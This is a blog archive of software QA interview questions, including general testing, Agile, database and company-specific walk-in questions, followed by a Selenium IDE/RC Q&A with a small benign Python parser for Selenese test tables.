Archive for the ‘Interview Questions’ Category

Important interview questions for QA

Please find below the questions; it is good to know all these things before getting into a Software QA job. And most importantly, I know that you guys can get all this information on the internet or Google it, but my intention is to collect and share all types of QA interview questions so that you guys can pass them on to / refer them to the rest of your friends.

1. What types of documents would you need for QA, QC, and Testing?

2. What did you include in a test plan?

3. Describe any bug you remember.

4. What is the purpose of the testing?

5. What do you like (not like) in this job?

6. What is quality assurance?

7. What is the difference between QA and testing?

8. How do you scope, organize, and execute a test project?

9. What is the role of QA in a development project?

10. What is the role of QA in a company that produces software?

11. Define quality for me as you understand it

12. Describe to me the difference between validation and verification.

13. Describe to me what you see as a process. Not a particular process, just the basics of having a process.

14. Describe to me when you would consider employing a failure mode and effect analysis.

15. Describe to me the Software Development Life Cycle as you would define it.

16. What are the properties of a good requirement?

17. How do you differentiate the roles of Quality Assurance Manager and Project Manager?

18. Tell me about any quality efforts you have overseen or implemented. Describe some of the challenges you faced and how you overcame them.

19. How do you deal with environments that are hostile to quality change efforts?

20. In general, how do you see automation fitting into the overall process of testing?

21. How do you promote the concept of phase containment and defect prevention?

22. If you come onboard, give me a general idea of what your first overall tasks will be as far as starting a quality effort.

23. What kinds of testing have you done?

24. Have you ever created a test plan?

25. Have you ever written test cases or did you just execute those written by others?

26. What did you base your test cases on?

27. How do you determine what to test?

28. How do you decide when you have ‘tested enough?’

29. How do you test if you have minimal or no documentation about the product?

30. Describe to me the basic elements you put in a defect report.

31. How do you perform regression testing?

32. At what stage of the life cycle does testing begin in your opinion?

33. How do you analyze your test results? What metrics do you try to provide?

34. Realising you won’t be able to test everything – how do you decide what to test first?

35. Where do you get your expected results?

36. If automating – what is your process for determining what to automate and in what order?

37. In the past, I have been asked to verbally start mapping out a test plan for a common situation, such as an ATM. The interviewer might say, “Just thinking out loud, if you were tasked to test an ATM, what items might your test plan include?” These types of questions are not meant to be answered conclusively, but they are a good way for the interviewer to see how you approach the task.

38. If you’re given a program that will average student grades, what kinds of inputs would you use?

39. Tell me about the best bug you ever found.

40. What made you pick testing over another career?

41. What is the exact difference between Integration & System testing, give me examples with your project.

42. How did you go about testing a project?

43. When should testing start in a project? Why?

44. How do you go about testing a web application?

45. Difference between Black & White box testing

46. What is Configuration management? Tools used?

47. What do you plan to become after say 2-5yrs (Ex: QA Manager, Why?)

48. Would you like to work in a team or alone, why?

49. Give me 5 strong & weak points of yours

50. Why do you want to join our company?

51. When should testing be stopped?

52. What sort of things would you put down in a bug report?

53. Who in the company is responsible for Quality?

54. Who defines quality?

55. What is an equivalence class?

56. Is “A fast database retrieval rate” a testable requirement?

57. Should we test every possible combination / scenario for a program?

58. What criteria do you use when determining when to automate a test or leave it manual?

59. When do you start developing your automation tests?

60. Discuss what test metrics you feel are important to publish in an organization.

61. In case anybody cares, here are the questions that I will be asking:

62. Describe the role that QA plays in the software lifecycle.

63. What should Development require of QA?

64. What should QA require of Development?

65. How would you define a “bug?”

66. Give me an example of the best and worst experiences you’ve had with QA.

67. How does unit testing play a role in the development / software lifecycle?

68. Explain some techniques for developing software components with respect to testability.

69. Describe a past experience with implementing a test harness in the development of software.

70. Have you ever worked with QA in developing test tools? Explain the participation Development should have with QA in leveraging such test tools for QA use.

71. Give me some examples of how you have participated in Integration Testing.

72. How would you describe the involvement you have had with the bug-fix cycle between Development and QA?

73. What is unit testing?

74. Describe your personal software development process.

75. How do you know when your code has met specifications?

76. How do you know your code has met specifications when there are no specifications?

77. Describe your experiences with code analyzers.

78. How do you feel about cyclomatic complexity?

79. Who should test your code?

80. How do you survive chaos?

81. What processes / methodologies are you familiar with?

82. What type of documents would you need for QA / QC / Testing?

83. How can you use technology to solve a problem?

84. What type of metrics would you use?

85. How do you find out whether tools work well with your existing system?

86. What automated tools are you familiar with?

87. How well do you work with a team?

88. How would you ensure 100% coverage of testing?

89. How would you build a test team?

90. What problem do you have right now or have you had in the past? How did you solve it?

91. What will you do during the first day of job?

92. What would you like to do five years from now?

93. Tell me about the worst boss you’ve ever had.

94. What are your greatest weaknesses?

95. What are your strengths?

96. What is a successful product?

97. What do you like about Windows?

98. What is good code?

99. Who is Kent Beck, Dr Grace Hopper, Dennis Ritchie?

100. What are the basic, core practices for a QA specialist?

101. What do you like about QA?

102. What has not worked well in your previous QA experience and what would you change?

103. How will you begin to improve the QA process?

104. What is the difference between QA and QC?

105. What is UML and how to use it for testing?

106. What is CMM and CMMI? What is the difference?

107. What do you like about computers?

108. Do you have a favourite QA book? More than one? Which ones? And why.

109. What is the responsibility of programmers vs QA?

110. What are the properties of a good requirement?

111. How do you test if you have minimal or no documentation about the product?

112. What are all the basic elements in a defect report?

Additional questions for interview purposes (some questions may repeat):

1. What is Software Testing?

2. What is the Purpose of Testing?

3. What types of testing do testers perform?

4. What is the Outcome of Testing?

5. What kind of testing have you done?

6. What is the need for testing?

7. What are the entry criteria for Functionality and Performance testing?

8. What are test metrics?

9. Why do you go for White box testing, when Black box testing is available?

10. What are the entry criteria for Automation testing?

11. When to start and Stop Testing?

12. What is Quality?

13. What is a Baseline document? Can you name any two?

14. What is verification?

15. What is validation?

16. What is quality assurance?

17. What is quality control?

18. What is SDLC and TDLC?

19. What are the Qualities of a Tester?

20. When to start and Stop Testing?

21. What are the various levels of testing?

22. What are the types of testing you know and you experienced?

23. What exactly is Heuristic checklist approach for unit testing?

24. After completing testing, what would you deliver to the client?

25. What is a Test Bed?

26. What are Data Guidelines?

27. Why do you go for a Test Bed?

28. What is Severity and Priority and who will decide what?

29. Can automation testing replace manual testing? If so, how?

30. What is a test case?

31. What is a test condition?

32. What is the test script?

33. What is the test data?

34. What is an Inconsistent bug?

35. What is the difference between Re-testing and Regression testing?

36. What are the different types of testing techniques?

37. What are the different types of test case techniques?

38. What are the risks involved in testing?

39. Differentiate Test bed and Test Environment?

40. What is the difference between defect, error, bug, failure and fault?

41. What is the difference between quality and testing?

42. What is the difference between White & Black Box Testing?

43. What is the difference between Quality Assurance and Quality Control?

44. What is the difference between Testing and debugging?

45. What is the difference between bug and defect?

46. What is the difference between verification and validation?

47. What is the difference between functional spec. and Business requirement specification?

48. What is the difference between unit testing and integration testing?

49. What is the diff between Volume & Load?

50. What is diff between Volume & Stress?

51. What is the diff between Stress & Load Testing?

52. What is the Diff between Two Tier & Three tier Architecture?

53. What is the diff between Client Server & Web Based Testing?

54. What is the diff between Integration & System Testing?

55. What is the Diff between Code Walkthrough & Code Review?

56. What is the diff between walkthrough and inspection?

57. What is the Diff between SIT & IST?

58. What is the Diff between static and dynamic?

59. What is the diff between alpha testing and beta testing?

60. What are the Minimum requirements to start testing?

61. What is Smoke Testing, and when will it be done?

62. What is Adhoc Testing? When it can be done?

63. What is cookie testing?

64. What is security testing?

65. What is database testing?

66. What is the relationship between Quality & Testing?

67. How do you determine what is to be tested?

68. How do you go about testing a project?

69. What is the Initial Stage of testing?

70. What is Web Based Application Testing?

71. What is Client Server Application Testing?

72. What is Two Tier & Three tier Architecture?

73. What is the use of Functional Specification?

74. Why do we prepare test condition, test cases, test script (Before Starting Testing)?

75. Is it not a waste of time to prepare the test condition, test case & test script?

76. How do you go about testing a Web Application?

77. How do you go about testing of Client Server Application?

78. What is meant by Static Testing?

79. Can the static testing be done for both Web & Client Server Application?

80. In the Static Testing, what all can be tested?

81. Can test condition, test case & test script help you in performing the static testing?

82. What is meant by dynamic testing?

83. Is the dynamic testing a functional testing?

84. Is the Static testing a functional testing?

85. What are the functional testing you perform?

86. What is meant by Alpha Testing?

87. What kind of document do you need for Functional testing?

88. What is meant by Beta Testing?

89. At what stage does unit testing have to be done?

90. Who can perform the Unit Testing?

91. When will the Verification & Validation be done?

92. What is meant by Code Walkthrough?

93. What is meant by Code Review?

94. What is the testing that a tester performs at the end of Unit Testing?

95. What are the things you prefer and prepare before starting testing?

96. What is Integration Testing?

97. What is Incremental Integration Testing?

98. What is meant by System Testing?

99. What is meant by SIT?

100. When do you go for Integration Testing?

101. Can the System testing be done at any stage?

102. What are stubs & drivers?

103. What is the concept of top-down and bottom-up integration testing?

104. What is the final Stage of Integration Testing?

105. Where in the SDLC does testing start?

106. What is the Outcome of Integration Testing?

107. What is meant by GUI Testing?

108. What is meant by Back-End Testing?

109. What are the features, you take care in Prototype testing?

110. What is Mutation testing & when can it be done?

111. What is Compatibility Testing?

112. What is Usability Testing?

113. What is the importance of testing?

114. What is meant by regression Testing?

115. When do we prefer regression testing, and at what stages do we go for Regression Testing?

116. What is performance testing?

117. Which performance tests can be done manually, and which automatically?

118. What is Volume, Stress & Load Testing?

119. What is a Bug?

120. What is a Defect?

121. What is the defect Life Cycle?

122. What is the Priority in fixing the Bugs?

123. Explain the severity ratings you assign to the bugs found.

124. What is the difference between UAT & IST?

125. What is meant by UAT?

126. What all are the requirements needed for UAT?

127. What are the docs required for Performance Testing?

128. What is risk analysis?

129. How to do risk management?

130. What are test closure documents?

131. What is traceability matrix?

132. What ways have you followed for defect management?

Source:

http://kiranusa.wordpress.com

Interview Questions on Agile Development

November 29, 2012

Interview Questions on Agile Development Methodologies

1) What is Agile Development model and explain about different methodologies in Agile Software development?

The Agile development model is an incremental or iterative model. It has several methodologies:

Types of Agile Methodologies

o Scrum

o Extreme Programming (XP)

o Agile Unified Process (AUP)

o Dynamic Systems Development Method (DSDM)

o Essential Unified Process (EssUP)

o Exia Process (ExP)

o Feature Driven Development (FDD)

o Open Unified Process (OpenUP)

o Crystal Clear

o Velocity tracking

2) What is the difference between Agile and Waterfall Model?

Difference between Agile and Waterfall Model:
1. The main advantage of Agile is backward scalability. Under the waterfall approach we cannot change the decisions and implementations that we made in the previous stages; if we want to make changes under waterfall, we have to build the entire project from scratch once again.
2. The flexibility to check for errors at any stage of development makes Agile less error-prone than Waterfall, which can only test for bugs at the end of a development module.
3. Since Agile provides the flexibility to make changes as per customer requirements, it is more inclined towards better client satisfaction. This is a real setback for the Waterfall model, which doesn’t allow any modifications once a module has been completed.
4. Under Agile development, modular partitioning of the software can be carried out effectively compared to its counterpart. Though both allow segregation, the latter lacks modifications in the implementation stage: the rules are set down before the project commences, which hinders further breakdown of the logical modules. Agile can be of great help in such situations and allows simultaneous development of different modules as per time-bound requirements. If we want the project to be more segregated, Agile comes as a pain relief for developers.

3) How Agile is different?

Agile is different because
a) Greater Collaboration.
b) Shorter work cycle and constant feedback.
c) Need to embrace Change.
d) Greater flexibility.
e) Greater discipline.
f) Greater stakeholder accountability.
g) Greater range of skills.

4) What are the implications for testing in Agile?

– Agile testing must be iterative.
– Testers cannot rely on having complete specification.
– Agile testers must be flexible.

5) What are the Agile quality strategies?

Agile quality strategies are:
a) Re-factoring.
b) Non-solo development.
c) Static and dynamic code analysis
d) Reviews and inspection
– Iteration/sprint demos
– All-hands demo
– Light-weight milestone reviews
e) Short feedback cycles.
f) Standards and guidelines.

6) Explain about the Agile process?

The agile process follows the software development life cycle, which includes requirements gathering, analysis, design, coding and testing; it delivers partially implemented software and waits for customer feedback. In the whole process, customer satisfaction has the highest priority, together with faster development time.

7) What are the new features of the agile process?
In the agile process new features can be added easily by using multiple iterations.

1. Iterative: The main objective of agile software processes is customer satisfaction, so it focuses on a single requirement with multiple iterations.
2. Modularity: The agile process decomposes the complete system into manageable pieces called modules. Modularity plays a major role in software development processes.
3. Time Boxing: As the agile process is iterative in nature, it requires time limits on each module within its respective cycle.
4. Parsimony: In agile processes parsimony is required to mitigate risks and achieve the goals with a minimal number of modules.
5. Incremental: As the agile process is iterative in nature, it requires the system to be developed in increments; each increment is independent of the others, and at the end all increments are integrated into the complete system.
6. Adaptive: Due to the iterative nature of the agile process, new risks may occur. The adaptive characteristic of the agile process allows adapting the process to attack the new risks and allows changes to the requirements in real time.
7. Convergent: All the risks associated with each increment are converged in the agile process by using the iterative and incremental approach.
8. Collaborative: As the agile process is modular in nature, it needs good communication among the software development team. Different modules need to be integrated at the end of the software development process.
9. People Oriented: In agile processes customer satisfaction is the first priority, over technology and process. A good software development team increases the performance and productivity of the software.

8) Where the agile methods focus on?

The agile methods are focused on different aspects of the software development life cycle. Some focus on the practices (extreme programming, pair programming), while others focus on managing the software projects (the scrum approach).

9) What are the benefits of Agile Modeling?

Agile methodology has an adaptive team which is able to respond to changing requirements.
The team does not have to invest time and effort only to find that, by the time they delivered the product, the customer’s requirement had changed.
Face-to-face communication and continuous input from the customer representative leave no space for guesswork.
The documentation is crisp and to the point, to save time.
The end result is high quality software in the least possible time and a satisfied customer.

Database Testing questions asked by Interviewer @IGATE

October 13, 2012

Below are a few database testing questions which were asked by the interviewer when I attended the iGATE walk-in drive.

Company: Patni Computer System (now iGATE)

Interview Type: Walk-in Drive

Date: 18th September 2010, Saturday

  • What is database testing, and what do we normally check for in database testing?
  • How do you test a database manually? Explain with an example.
  • What is a data-driven test?
  • How do you check whether a trigger is fired or not while doing database testing?
  • How do you test database procedures and triggers?
  • Is “A fast database retrieval rate” a testable requirement?
  • What SQL statements have you used in database testing?
  • What are the different joins? Give an example of each.
  • Can you delete a parent table record if a child table record exists? How?
  • What is referential integrity?
  • What is a RowID?
  • How do you find out the database version?
  • How do you execute a SQL script in the query window?
  • How do you create a temporary variable?
  • How do you print an environment variable?
  • What is meant by a database user, and how is it different from a login?

Knowledge Work Book – Interview Question Bank(QA)

August 24, 2012

Company: Cybage Software [an SEI-CMMI Level 5 assessed & V1.3 company] www.cybage.com

Interview Type: Walk-in/Referral walk-in

Date: 11th August 2012

Venue: CT1, Kalyaninagar, PUNE

Rakesh Hansalia (QA, Cybage, Gandhinagar) http://www.linkedin.com/in/rakeshhansalia
Below are the questions which were asked to the candidates in the walk-in interview for QA position:

1) Describe yourself.

2) Describe your current project.

3) Which is the latest Android version?

4) What is the difference between Android 2.1 and Android 2.2?

5) OOPs concepts.

6) Difference between a class and an interface.

7) Different version control systems.

8) SQL queries.

9) Do you have any idea of joins in SQL?

10) Test case format.

11) What are smoke, regression and functional testing?

12) Bug life cycle.

13) What is equivalence partitioning?

14) How to identify an object in Selenium and QTP?

15) How to display a message in Selenium?

16) Different views in QTP.

17) Different modes in QTP.

18) What is a test automation framework?

19) What are the different types of automation frameworks?

20) How do you do security testing for an application?

21) What content do you include in a test status report?

22) How have you mentored your team? (This question is applicable if you have written in your CV that you have mentored.)

23) Have you prepared a test plan? If yes, then what content do you include in the test plan?

24) Would you like to ask us any questions?

25) Describe application certification testing.

26) How do you do certification testing?

27) What role are you playing in your current company?

28) What are the differences and similarities between the mobile app which you are testing in your current project and the same app if you tested it on Windows?

29) Difference between System testing and Functional testing.

30) 3 most important test scenarios for a pen.

31) 3 least important test scenarios for a pen from the user’s point of view.

32) Suppose there are 100 requirements; how will you estimate them?

33) Suppose there are 1000 test cases; will you run all 1000 test cases on all devices?

34) 3 assert commands.

35) Difference between Selenium WebDriver, RC and IDE.

36) Rate yourself for automation.

37) What are the components of QTP?

38) Do you have knowledge of SQL?

39) What is compatibility testing? Is compatibility testing functional or non-functional?

40) What is non-functional testing?

41) Relate usability and reliability to your current project.

42) Suppose somebody in your team is not comfortable with you and he/she does not tell anybody what he/she feels, but you know that your peer is not comfortable; then what will you do?

43) If you have mentioned hobbies in your resume, then they can ask you questions related to your hobbies.

44) Do you have any questions which you want to ask?

45) What is root cause analysis?

46) 3 scenarios for which you as a tester can’t do root cause analysis or help the developer to know the reason for a bug.

47) Write a C program to create the pattern:

1

2 2

3 3 3

48) What is stdio.h?

49) What is a library?

50) Tell me the names of 3 libraries.

51) Tell me the names of 5 automation tools for mobile.

52) Suppose you are the only resource and work is of 3 days and you have to complete it in 2 days, then what will you do?

53) Suppose you have to select device for an application which should work on latest as well as previous Android versions, then which device will you select?

54) What is polymorphism?

Interview Questions @ Polaris

June 27, 2012

a. Interview Date: 29-05-2010
b. Company Name: Polaris
c. Location: Hyderabad

I faced following questions in Polaris Interview.

1. Tell me about your current organization.
2. What is Black box testing?
3. What is white box testing?
4. What is Functional Testing?
5. What is the difference between Black box & functional testing?
6. What is a test plan?
7. What is a test strategy?
8. What is the difference between a Test plan & a test strategy?
9. What is smoke testing?
10. What is sanity testing?
11. Who will perform smoke testing?
12. Explain the Agile process.
13. How much do you know about QTP? (I mentioned in my resume that I have exposure to QTP.)
14. Explain your current project.
15. What is the Requirement Traceability Matrix?
16. Can you draw the template for a Requirement Traceability Matrix?
17. What is Ad-hoc Testing?
18. What is the difference between Re-testing and Regression Testing?
19. Can you explain the Bug life cycle?
20. How can you make sure whether all requirements are covered or not?
21. Can you explain the biggest complexity in your current project?
22. What is the difference between bug severity and priority?
23. Which bug tracking tool are you using?
24. Can you give one example of a High severity and low priority bug?
25. Can you give one example of a High priority and low severity bug?
26. What is security Testing?

Selenium IDE Interview Questions & Answers - Rakesh Hansalia

1. What do you know about Selenium?
Selenium is a suite of tools for web automation testing. Selenium first came to life in 2004 when Jason Huggins was testing an internal application at ThoughtWorks. Although Selenium was a tremendous tool, it wasn’t without its drawbacks: because of its JavaScript-based automation engine and the security limitations browsers apply to JavaScript, certain things became impossible to do.
The Selenium suite of projects includes:
Selenium IDE
Selenium Core
Selenium 1 (known as Selenium RC or Remote Control)
Selenium 2 (known as Selenium WebDriver)
Selenium Grid


2. What are the technical challenges with selenium?

As you know, Selenium is a freeware, open source testing tool. There are many challenges with Selenium.

–> Selenium supports only web based applications
–> It doesn’t support any non-web based applications (like Win32, Java Applet, Java Swing, .Net client server, etc.)
–> When you compare Selenium with QTP, Silk Test, Test Partner and RFT, there are many challenges in terms of maintainability of the test cases
–> Since Selenium is a freeware tool, there is no direct vendor support if one runs into trouble with the application under test
–> There is no object repository concept in Selenium, so the maintenance effort for objects is very high
–> There are many challenges if one has to interact with Win32 windows, even when working with web based applications
–> Bitmap comparison is not supported by Selenium

–> For any reporting related capabilities, you need to depend on third party tools

–> You need to learn one of the native languages (.Net, Java, Perl, Python, PHP, Ruby) to work efficiently with the scripting side of Selenium


3. What are the test types supported by Selenium?

Selenium can be used for testing web based applications.

The test types supported are:

1. Functional,
2. Regression,
3. Load testing

The automation tool can be implemented for post-release validation with continuous integration tools like:
1. Jenkins,
2. Hudson,
3. Quick Build
4. CruiseCont


4. What are the capabilities of Selenium IDE?

Selenium IDE (Integrated Development Environment) works similarly to commercial tools like QTP, Silk Test and Test Partner. The points below describe Selenium IDE well.

1. Selenium IDE is a Firefox add-on.
2. Selenium IDE supports recording clicks, typing and other actions to make test cases.
3. Using Selenium IDE, a tester can play back the test cases in the Firefox browser.
4. Selenium IDE supports exporting the test cases and suites to Selenium RC.
5. Step-by-step debugging of test cases is possible.
6. Breakpoint insertion is possible.
7. Page abstraction functionality is supported by Selenium IDE.
8. Selenium IDE has an extensibility capability allowing the use of add-ons or user extensions that expand its functionality.


5. What are the challenges with Selenium IDE?

Selenium IDE does not directly support:

1. Condition statements
2. Iteration or looping
3. Logging and reporting of test results
4. Error handling, particularly unexpected errors
5. Database testing
6. Test case grouping
7. Re-execution of failed tests
8. Test case dependency
9. Capturing screenshots on test failures
10. Results report generation


6. Which are the browsers supported by Selenium IDE?

Selenium IDE supports only one browser, Mozilla Firefox. The versions supported as of now are:

Mozilla Firefox 2.x
Mozilla Firefox 3.x

The versions not supported as of now are:
versions earlier than Mozilla Firefox 2.x
Mozilla Firefox 4.x


7. How to execute a single line command from Selenium IDE?

A single line command can be executed from Selenium IDE in two ways:

1. Right click on the command in Selenium IDE and select “Execute This Command”
2. Select the command in Selenium IDE and press the “X” key on the keyboard


8. How to insert a start point in Selenium IDE?

A start point in Selenium IDE can be set in two ways:

1. Right click on the command in Selenium IDE and select “Set / Clear Start Point”
2. Select the command in Selenium IDE and press the “S” key on the keyboard
3. You can have only one start point
4. If you have already set one start point and you select another command as the start point, the first start point will be removed and the new start point will be set


9. How to insert a comment in Selenium IDE?

Comments in Selenium IDE can be set in two ways:

1. Right click on the command in Selenium IDE and select “Insert New Comment”
2. If you want to comment out an existing line, you need to follow the steps below:

a. Select the Source tab in the IDE
b. Select the line which you want to comment out
c. For example, to comment out an open command, the source should look like the code below

<tr>

<!--

<td>open</td>
<td>/node/304/edit</td>
<td></td>

-->

</tr>

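Commenting out a command in the Source tab relies on the Selenese HTML table format: each <tr> is one command and each <td> one of its three cells. The Python below is an added example (not code from the original post): it parses such a test table, reporting active commands separately from those wrapped in an HTML comment, and expands ${var} references of the kind the echo command in Q14 uses. The sample table and the rule that unknown variable names are left untouched are constructed assumptions.

```python
import re
from html.parser import HTMLParser

# Constructed sample of a Selenese HTML test case in the table format Selenium IDE
# shows in its Source tab: one <tr> per command, three <td> cells per row.
# The second row is commented out exactly as the answer above describes.
SAMPLE_TEST = """
<table>
<tr><td>open</td><td>/node/304/edit</td><td></td></tr>
<tr>
<!--
<td>type</td><td>id=title</td><td>Hello</td>
-->
</tr>
<tr><td>clickAndWait</td><td>id=edit-submit</td><td></td></tr>
<tr><td>echo</td><td>${var1}</td><td></td></tr>
</table>
"""


class SeleneseParser(HTMLParser):
    """Collects (command, target, value) triples from <tr>/<td> rows.

    Cells inside an HTML comment never reach handle_starttag; the parser
    hands the raw comment text to handle_comment instead, where it is
    re-parsed so disabled commands can be reported separately.
    """

    def __init__(self):
        super().__init__()
        self.active = []      # commands Selenium IDE would execute
        self.disabled = []    # commands wrapped in <!-- ... -->
        self._cells = None    # cell texts of the row being read, or None
        self._in_td = False

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._cells = []
        elif tag == "td" and self._cells is not None:
            self._in_td = True
            self._cells.append("")

    def handle_data(self, data):
        if self._in_td:
            self._cells[-1] += data

    def handle_endtag(self, tag):
        if tag == "td":
            self._in_td = False
        elif tag == "tr" and self._cells is not None:
            if self._cells:   # a row holding only a comment yields no cells
                self.active.append(self._row_to_triple(self._cells))
            self._cells = None

    def handle_comment(self, data):
        # Re-parse the comment body as a row to recover the disabled command(s)
        inner = SeleneseParser()
        inner.feed("<tr>" + data + "</tr>")
        inner.close()
        self.disabled.extend(inner.active)

    @staticmethod
    def _row_to_triple(cells):
        cells = [c.strip() for c in cells] + ["", "", ""]   # pad short rows
        return tuple(cells[:3])


def parse_selenese(html):
    """Return (active_commands, disabled_commands) for a Selenese HTML test."""
    parser = SeleneseParser()
    parser.feed(html)
    parser.close()
    return parser.active, parser.disabled


def expand_variables(text, variables):
    """Expand ${name} references as used by commands such as echo ${var1}.

    Assumption: names with no stored value are left untouched.
    """
    return re.sub(r"\$\{(\w+)\}",
                  lambda m: str(variables.get(m.group(1), m.group(0))), text)


if __name__ == "__main__":
    active, disabled = parse_selenese(SAMPLE_TEST)
    for cmd in active:
        print("active  ", cmd)
    for cmd in disabled:
        print("disabled", cmd)
    stored = {"var1": "The sample message"}   # constructed stored-variable table
    print(expand_variables(active[-1][1], stored))
```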

10. How to insert a break point in Selenium IDE?

A break point can be set in two ways in Selenium IDE:

1. Right click on the command in Selenium IDE and select “Toggle Break Point”
2. Select the command in Selenium IDE and press the “B” key on the keyboard
3. If you want to clear the break point, press the “B” key once again
4. You can set multiple break points in Selenium IDE


11. How to debug the tests in Selenium IDE?

To debug or execute the test cases line by line, follow the steps below:

1. Insert a break point at the location from which you want to execute step by step
2. Run the test case
3. Execution will be paused at the given break point
4. Click on the Step (blue) button to continue with the next statement
5. Click on the Run button to continue executing all the remaining commands at once


12. How to export the tests from Selenium IDE to Selenium RC in different languages?

From Selenium IDE, the test cases can be exported into the following languages:

1. .Net
2. Java
3. Perl
4. Python
5. PHP
6. Ruby

The steps below explain how to export the test cases:

1. Open the test case in Selenium IDE
2. Select File -> Export Test Case As

 

13. How to export Selenium IDE Test Suite to Selenium RC Suites?

From Selenium IDE, the test suites can be exported into the languages mentioned below:

1. .Net
2. Java
3. Perl
4. Python
5. PHP
6. Ruby

The steps below explain how to export the test suites:

1. Open the test suite in Selenium IDE
2. Select File -> Export Test Suite As

 

14. Which is the command used for displaying the values of a variable into the output console or log?

The command used for displaying the value of a variable in the output console or log is echo.

To display a constant string, use the command below:
echo <constant string>
ex: echo "The sample message"

To display the value of a variable, write it as below:
echo ${<variable name>}

ex: echo ${var1}

Note: Here var1 is the variable

 

15. Which are the browsers supported by Selenium RC?

Supported browsers for Selenium RC include:

1. *firefox
2. *mock
3. *firefoxproxy
4. *pifirefox
5. *chrome
6. *iexploreproxy
7. *iexplore
8. *firefox3
9. *safariproxy
10. *googlechrome
11. *konqueror
12. *firefox2
13. *safari
14. *piiexplore
15. *firefoxchrome
16. *opera
17. *iehta
18. *custom

 

16. Which are the Operating Systems supported by Selenium?

Selenium IDE
Works in Firefox 2+
Operating Systems Supported:

1. Windows,
2. OS X
3. Linux
4. Solaris
5. Others whichever supports Firefox 2+

Selenium Remote Control
Used for starting browser and run tests
Operating Systems Supported:

1. Windows,
2. OS X
3. Linux
4. Solaris
5. Others

Selenium Core
Used for running tests
Operating Systems Supported:

1. Windows,
2. OS X
3. Linux
4. Solaris
5. Others

 

17. What is Selenium RC?

Selenium-RC is the solution for tests that need a little more than just simple browser actions and a linear execution. Selenium-RC leverages the full power of programming languages, creating tests that can do things like read and write external files, make queries to a database, send emails with test reports, and practically anything else a user can do with a normal application.

You will want to use Selenium-RC whenever your test requires logic not supported by running a script from Selenium-IDE

 

18. Why Selenium RC is used?

Selenium-IDE does not directly support:

1. condition statements
2. iteration
3. logging and reporting of test results
4. error handling, particularly unexpected errors
5. database testing
6. test case grouping
7. re-execution of failed tests
8. test case dependency
9. capture screenshots on test failures

The reason Selenium-IDE does not support the above requirements is that the IDE supports only the HTML language, and HTML has no constructs for conditions, loops or connections to external sources.

To overcome the above problems, Selenium RC is used.

Selenium RC supports the languages .Net, Java, Perl, Python, PHP and Ruby; in these languages we can write the program logic that covers what the IDE cannot.

 

19. Which are the languages supported by Selenium RC?

The languages supported by Selenium RC

1. .Net,
2. Java (JUnit 3, JUnit 4, TestNG, Groovy)
3. Perl,
4. Python,
5. PHP,
6. Ruby

 

20. What is Selenium Grid?

Selenium Grid is part of the Selenium suite of projects. Selenium Grid transparently distributes your tests over multiple machines so that you can run your tests in parallel, cutting down the time required for running in-browser test suites. This dramatically speeds up in-browser web testing, giving you quick and accurate feedback you can rely on to improve your web application.

 

21. What is Selenium WebDriver or Google WebDriver or Selenium 2.0?

WebDriver uses a different underlying framework from Selenium’s javascript Selenium-Core. It also provides an alternative API with functionality not supported in Selenium-RC. WebDriver does not depend on a javascript core embedded within the browser, therefore it is able to avoid some long-running Selenium limitations.

WebDriver’s goal is to provide an API that establishes
• A well-designed standard programming interface for web-app testing.
• Improved consistency between browsers.
• Additional functionality addressing testing problems not well-supported in Selenium 1.0.

The Selenium developers strive to continuously improve Selenium. Integrating WebDriver is another step in that process. The developers of Selenium and of WebDriver felt they could make significant gains for the Open Source test automation community by combining forces and merging their ideas and technologies. Integrating WebDriver into Selenium is the current result of those efforts.

 

22. What are the capabilities of Selenium WebDriver or Google WebDriver or Selenium 2.0?

One should use WebDriver when requiring improved support for

• Multi-browser testing including improved functionality for browsers not well-supported by Selenium-1.0.
• Handling multiple frames, multiple browser windows, popups, and alerts.
• Page navigation.
• Drag-and-drop.
• AJAX-based UI elements.

 

23. What is the architecture of Selenium RC?

The Selenium Server which launches and kills browsers, and acts as an HTTP proxy for browser requests.

Client libraries for various programming languages, each of which instructs the Selenium Server in how to test the AUT by passing it your test script’s Selenium commands.

The diagram shows the client libraries communicate with the Server passing each Selenium command for execution. Then the server passes the Selenium command to the browser using Selenium-Core JavaScript commands. The browser, using its JavaScript interpreter, executes the Selenium command, which effectively, runs the check you specified in your Selenese test script.

 

24. What is the architecture of Selenium Grid?

The below mentioned theory explains about the setup of Selenium Grid with architecture and how it works.

Selenium Grid builds on the traditional Selenium setup, taking advantage of the following properties:

* The Selenium test, the application under test, and the remote control/browser pair do not have to be co-located. They communicate through HTTP, so they can all live on different machines.
* The Selenium tests and the web application under test are obviously specific to a particular project. Nevertheless, neither the Selenium remote control nor the browser is tied to a specific application. As a matter of fact, they provide a capacity that can easily be shared by multiple applications and multiple projects.

Consequently, if only we could build a distributed grid of Selenium Remote Controls, we could easily share it across builds, applications, projects – even potentially across organizations. Of course we would also need to address the scalability issues as described earlier when covering the traditional Selenium setup. This is why we need a component in charge of:

* Allocating a Selenium Remote Control to a specific test (transparently)
* Limiting the number of concurrent test runs on each Remote Control
* Shielding the tests from the actual grid infrastructure

Selenium Grid calls this component the Selenium Hub.

* The Hub exposes an external interface that is exactly the same as the one of a traditional Remote Control. This means that a test suite can transparently target a regular Remote Control or a Selenium Hub with no code change. It just needs to target a different IP address. This is important as it shields the tests from the grid infrastructure (which you can scale transparently). This also makes the developer’s life easier. The same test can be run locally on a developer machine, or run on a heavy duty distributed grid as part of a build – without ever changing a line of code.
* The Hub allocates Selenium Remote Controls to each test. The Hub is also in charge of routing the Selenese requests from the tests to the appropriate Remote Control as well as keeping track of testing sessions.
* When a new test starts, the Hub puts its first request on hold if there is no available Remote Control in the grid providing the appropriate capabilities. As soon as a suitable Remote Control becomes available, the Hub will serve the request. For the whole time, the tests do not have to be aware of what is happening within the grid; it is just waiting for an HTTP response to come back.

 

25. Does Selenium support mobile internet testing?

Selenium supports Opera, and Opera is used on most smart phones, so Selenium can be used to test on whichever smart phone supports Opera. Hence one can use Selenium RC to run the tests on mobiles.

 

26. Does Selenium support Google Android Operating System?

Yes, Selenium Web Driver or Google Web Driver or Selenium 2.0 supports Android Operating System. There are several libraries written to support Android Operating System.

 

27. What are the types of text patterns available in Selenium?

There are three types of patterns available in Selenium
1. globbing
2. regular expressions
3. exact

 

28. How to use regular expressions in Selenium?

Regular expressions in Selenium IDE are used with the keyword regexp: as a prefix to the value; the pattern that the expected value must match follows the prefix.

For example if you want to use the regular expression for a command
Command: verifyText
Target: //font/font/b/font[1]
Value: Flight Confirmation # 2011-05-02451

